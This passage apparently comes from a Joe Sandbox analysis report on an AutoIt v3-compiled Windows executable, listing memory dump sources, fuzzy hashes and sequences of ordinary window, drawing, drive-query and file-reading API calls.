                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 308d9a5289786f9ab583eeb7bf038f80338737c393305e5916e1d95d3d7d7d52
                                                      • Instruction ID: bd88bd1fdfaf7da6f63810f43d4087bb5437e2ffb856c852a543b853cd3bb109
                                                      • Opcode Fuzzy Hash: 308d9a5289786f9ab583eeb7bf038f80338737c393305e5916e1d95d3d7d7d52
                                                      • Instruction Fuzzy Hash: F802B6B0A00105EFDB05DF64D845AAEBBF5FF48304F109169E81ABB391EB71AA14CB91
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f13fb03b3fc77799c19151dfcc9f3aa669dc2ae1ef346f1b5cc58ccee892ecbd
                                                      • Instruction ID: 86866973ca769650a6c319974b648eb764fd247f5266560ff15a00d6a32215a1
                                                      • Opcode Fuzzy Hash: f13fb03b3fc77799c19151dfcc9f3aa669dc2ae1ef346f1b5cc58ccee892ecbd
                                                      • Instruction Fuzzy Hash: BAB11320D2AF414DC323963A9931336B75CAFBB6D5F91E31BFC2674D22EB2286874141
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f1c18080636a68af2db7780b48e7c5124031e0e8c371cbb3df6318a64d0d4067
                                                      • Instruction ID: 42e1342be64425ee072a1ddb320ab718ce44535be0965b7fb4e69591f0ed6511
                                                      • Opcode Fuzzy Hash: f1c18080636a68af2db7780b48e7c5124031e0e8c371cbb3df6318a64d0d4067
                                                      • Instruction Fuzzy Hash: 0161663060830957EA749A28B995BFE63D6DF4130BF143D19ECC2FB282DA119E6EC315
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3c346bf402b29cbc82e47e8ed4f69c7b470be5cee6f2db77197435aaec857c14
                                                      • Instruction ID: e32cd272879c5ec6a08e843e15b75a87411b2b8f930b2fc30230c211fb2981df
                                                      • Opcode Fuzzy Hash: 3c346bf402b29cbc82e47e8ed4f69c7b470be5cee6f2db77197435aaec857c14
                                                      • Instruction Fuzzy Hash: 9E615A7120870956DA3849287956BBE23E49F4370BF103D5DEDC3FB281EA129D6EC355
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f67cdcaf3a8c69488fc5e2fceb3e6c6ec5ec84cdb2aa70237e87cf7386358c60
                                                      • Instruction ID: 5d7e1b5f7592a173ec85d6af60ab413f82b0beb5c396a591944234990083ff29
                                                      • Opcode Fuzzy Hash: f67cdcaf3a8c69488fc5e2fceb3e6c6ec5ec84cdb2aa70237e87cf7386358c60
                                                      • Instruction Fuzzy Hash: 61513CC285EBC91BCB53A7745C6A08CBF618C570703684BDFC0F1455E7FA89454AC7A6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2159335392.0000000001486000.00000040.00000020.00020000.00000000.sdmp, Offset: 01486000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1486000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                      • Instruction ID: 5263e7e05a79df6829829e0a2784b9cfd861b2f64fe8a0e6ee97d45b9c56b6b0
                                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                      • Instruction Fuzzy Hash: AD41D371D1051CEBCF48CFADC991AEEBBF2AF88201F648299D516AB345D730AB41DB40
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 128f524c6d7dfc226b0c5af6138b7d7ef588f99b528623219d7e2693b26b861f
                                                      • Instruction ID: 72481ab4020c1651d5c320416d5336a3b8461b2c9f233bb8606f4ca34418ae89
                                                      • Opcode Fuzzy Hash: 128f524c6d7dfc226b0c5af6138b7d7ef588f99b528623219d7e2693b26b861f
                                                      • Instruction Fuzzy Hash: 0121D8323205158BD728CE79C86267A73E5B754310F15862EE4A7D73D1DE36A904D750
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2159335392.0000000001486000.00000040.00000020.00020000.00000000.sdmp, Offset: 01486000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1486000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                      • Instruction ID: cf55f17d8dc9b1f89f237aae54c6207e0bfa5477e5a54aac1927252b9f36c2fa
                                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                      • Instruction Fuzzy Hash: 6E01E478A00109EFCB44EF98C5809AEF7F5FF88310F20869AD819A7701E731AE41DB80
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2159335392.0000000001486000.00000040.00000020.00020000.00000000.sdmp, Offset: 01486000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1486000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                      • Instruction ID: 1fcc870f70532c03c62f12f80fe14dc920c8c07eff303de0018a807d664356d5
                                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                      • Instruction Fuzzy Hash: 95019278A00109EFCB45EF98C5909AEF7B5FB48350F20859AD919A7311D730AE41DB80
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2159335392.0000000001486000.00000040.00000020.00020000.00000000.sdmp, Offset: 01486000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1486000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 00EB2B30
                                                      • DeleteObject.GDI32(00000000), ref: 00EB2B43
                                                      • DestroyWindow.USER32 ref: 00EB2B52
                                                      • GetDesktopWindow.USER32 ref: 00EB2B6D
                                                      • GetWindowRect.USER32(00000000), ref: 00EB2B74
                                                      • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00EB2CA3
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00EB2CB1
                                                      • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB2CF8
                                                      • GetClientRect.USER32(00000000,?), ref: 00EB2D04
                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00EB2D40
                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB2D62
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB2D75
                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB2D80
                                                      • GlobalLock.KERNEL32(00000000), ref: 00EB2D89
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB2D98
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00EB2DA1
                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB2DA8
                                                      • GlobalFree.KERNEL32(00000000), ref: 00EB2DB3
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB2DC5
                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00ECFC38,00000000), ref: 00EB2DDB
                                                      • GlobalFree.KERNEL32(00000000), ref: 00EB2DEB
                                                      • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00EB2E11
                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00EB2E30
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB2E52
                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB303F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                      • API String ID: 2211948467-2373415609
                                                      • Opcode ID: a874a78002138684f1229dcc16412cea85bd7ab0a6c6fb9e8e387ae622525ea7
                                                      • Instruction ID: 33e44792a1cf2623a12e70de77feca9749b4919074bba12b8cc6815afe5d613d
                                                      • Opcode Fuzzy Hash: a874a78002138684f1229dcc16412cea85bd7ab0a6c6fb9e8e387ae622525ea7
                                                      • Instruction Fuzzy Hash: D0028D71900208AFDB14DF65CD89EAE7BB9FF48714F149118F919BB2A1CB71AD06CB60
                                                      APIs
                                                      • SetTextColor.GDI32(?,00000000), ref: 00EC712F
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00EC7160
                                                      • GetSysColor.USER32(0000000F), ref: 00EC716C
                                                      • SetBkColor.GDI32(?,000000FF), ref: 00EC7186
                                                      • SelectObject.GDI32(?,?), ref: 00EC7195
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00EC71C0
                                                      • GetSysColor.USER32(00000010), ref: 00EC71C8
                                                      • CreateSolidBrush.GDI32(00000000), ref: 00EC71CF
                                                      • FrameRect.USER32(?,?,00000000), ref: 00EC71DE
                                                      • DeleteObject.GDI32(00000000), ref: 00EC71E5
                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00EC7230
                                                      • FillRect.USER32(?,?,?), ref: 00EC7262
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EC7284
                                                        • Part of subcall function 00EC73E8: GetSysColor.USER32(00000012), ref: 00EC7421
                                                        • Part of subcall function 00EC73E8: SetTextColor.GDI32(?,?), ref: 00EC7425
                                                        • Part of subcall function 00EC73E8: GetSysColorBrush.USER32(0000000F), ref: 00EC743B
                                                        • Part of subcall function 00EC73E8: GetSysColor.USER32(0000000F), ref: 00EC7446
                                                        • Part of subcall function 00EC73E8: GetSysColor.USER32(00000011), ref: 00EC7463
                                                        • Part of subcall function 00EC73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EC7471
                                                        • Part of subcall function 00EC73E8: SelectObject.GDI32(?,00000000), ref: 00EC7482
                                                        • Part of subcall function 00EC73E8: SetBkColor.GDI32(?,00000000), ref: 00EC748B
                                                        • Part of subcall function 00EC73E8: SelectObject.GDI32(?,?), ref: 00EC7498
                                                        • Part of subcall function 00EC73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00EC74B7
                                                        • Part of subcall function 00EC73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EC74CE
                                                        • Part of subcall function 00EC73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00EC74DB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                      • String ID:
                                                      • API String ID: 4124339563-0
                                                      • Opcode ID: 90cc1a22ffc7c370d6d2f9de8f3ba7f46a878c1580ec9946198dcb9dc1038f05
                                                      • Instruction ID: 38c792fb519c35a041698acbbd3b6e8a61c149f72b6fb01677414a1d3608d261
                                                      • Opcode Fuzzy Hash: 90cc1a22ffc7c370d6d2f9de8f3ba7f46a878c1580ec9946198dcb9dc1038f05
                                                      • Instruction Fuzzy Hash: EEA1A072009301AFD7009F65DD48E5B7BA9FB48320F241A2DF9A6B61E1D732E94ACF51
                                                      APIs
                                                      • DestroyWindow.USER32(00000000), ref: 00EB273E
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00EB286A
                                                      • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00EB28A9
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00EB28B9
                                                      • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00EB2900
                                                      • GetClientRect.USER32(00000000,?), ref: 00EB290C
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00EB2955
                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00EB2964
                                                      • GetStockObject.GDI32(00000011), ref: 00EB2974
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00EB2978
                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00EB2988
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EB2991
                                                      • DeleteDC.GDI32(00000000), ref: 00EB299A
                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00EB29C6
                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00EB29DD
                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00EB2A1D
                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00EB2A31
                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00EB2A42
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00EB2A77
                                                      • GetStockObject.GDI32(00000011), ref: 00EB2A82
                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00EB2A8D
                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00EB2A97
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                      • API String ID: 2910397461-517079104
                                                      • Opcode ID: c2d67ad96ed82a55be8e1451e685b99517830db25fda5e2a80af739796f1874a
                                                      • Instruction ID: 3d921be10ea618138f284817a4d0b5345a535bdd579b8b10464424677c93f267
                                                      • Opcode Fuzzy Hash: c2d67ad96ed82a55be8e1451e685b99517830db25fda5e2a80af739796f1874a
                                                      • Instruction Fuzzy Hash: A0B14BB1A00219AFEB24DFA9CC49FAB7BA9FB08710F105119FA15E7290D770AD45CB94
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00EA4AED
                                                      • GetDriveTypeW.KERNEL32(?,00ECCB68,?,\\.\,00ECCC08), ref: 00EA4BCA
                                                      • SetErrorMode.KERNEL32(00000000,00ECCB68,?,\\.\,00ECCC08), ref: 00EA4D36
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DriveType
                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                      • API String ID: 2907320926-4222207086
                                                      • Opcode ID: 811b62b6b8ed5103f2a2375b1c70f7b0830534ecf3f84038451d5d7ca6bf7e83
                                                      • Instruction ID: b397de8addaba1499f6f2a845134c3b218cbabaa2a89d3aa608c44d8da7061f2
                                                      • Opcode Fuzzy Hash: 811b62b6b8ed5103f2a2375b1c70f7b0830534ecf3f84038451d5d7ca6bf7e83
                                                      • Instruction Fuzzy Hash: 6C61D3B12052099BDB04EF24C982AB8B7F0AB8A314B247415E50ABF2D1DBB2FD41DB51
                                                      APIs
                                                      • GetSysColor.USER32(00000012), ref: 00EC7421
                                                      • SetTextColor.GDI32(?,?), ref: 00EC7425
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00EC743B
                                                      • GetSysColor.USER32(0000000F), ref: 00EC7446
                                                      • CreateSolidBrush.GDI32(?), ref: 00EC744B
                                                      • GetSysColor.USER32(00000011), ref: 00EC7463
                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EC7471
                                                      • SelectObject.GDI32(?,00000000), ref: 00EC7482
                                                      • SetBkColor.GDI32(?,00000000), ref: 00EC748B
                                                      • SelectObject.GDI32(?,?), ref: 00EC7498
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00EC74B7
                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EC74CE
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00EC74DB
                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00EC752A
                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00EC7554
                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00EC7572
                                                      • DrawFocusRect.USER32(?,?), ref: 00EC757D
                                                      • GetSysColor.USER32(00000011), ref: 00EC758E
                                                      • SetTextColor.GDI32(?,00000000), ref: 00EC7596
                                                      • DrawTextW.USER32(?,00EC70F5,000000FF,?,00000000), ref: 00EC75A8
                                                      • SelectObject.GDI32(?,?), ref: 00EC75BF
                                                      • DeleteObject.GDI32(?), ref: 00EC75CA
                                                      • SelectObject.GDI32(?,?), ref: 00EC75D0
                                                      • DeleteObject.GDI32(?), ref: 00EC75D5
                                                      • SetTextColor.GDI32(?,?), ref: 00EC75DB
                                                      • SetBkColor.GDI32(?,?), ref: 00EC75E5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                      • String ID:
                                                      • API String ID: 1996641542-0
                                                      • Opcode ID: b5fbe0a0c5f4fb5a4edec64189697012144c2330d263c9d8f231b66afed7ab1d
                                                      • Instruction ID: 0fb65737a5ce81d4977c6a79916589c1b24b677b1b73cabed3d41a0c8966c939
                                                      • Opcode Fuzzy Hash: b5fbe0a0c5f4fb5a4edec64189697012144c2330d263c9d8f231b66afed7ab1d
                                                      • Instruction Fuzzy Hash: C5616072900218AFDB019FA5DC49EEE7FB9FB08320F244125F915BB2A1D7729942CF90
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 00EC1128
                                                      • GetDesktopWindow.USER32 ref: 00EC113D
                                                      • GetWindowRect.USER32(00000000), ref: 00EC1144
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EC1199
                                                      • DestroyWindow.USER32(?), ref: 00EC11B9
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00EC11ED
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EC120B
                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00EC121D
                                                      • SendMessageW.USER32(00000000,00000421,?,?), ref: 00EC1232
                                                      • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00EC1245
                                                      • IsWindowVisible.USER32(00000000), ref: 00EC12A1
                                                      • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00EC12BC
                                                      • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00EC12D0
                                                      • GetWindowRect.USER32(00000000,?), ref: 00EC12E8
                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00EC130E
                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00EC1328
                                                      • CopyRect.USER32(?,?), ref: 00EC133F
                                                      • SendMessageW.USER32(00000000,00000412,00000000), ref: 00EC13AA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
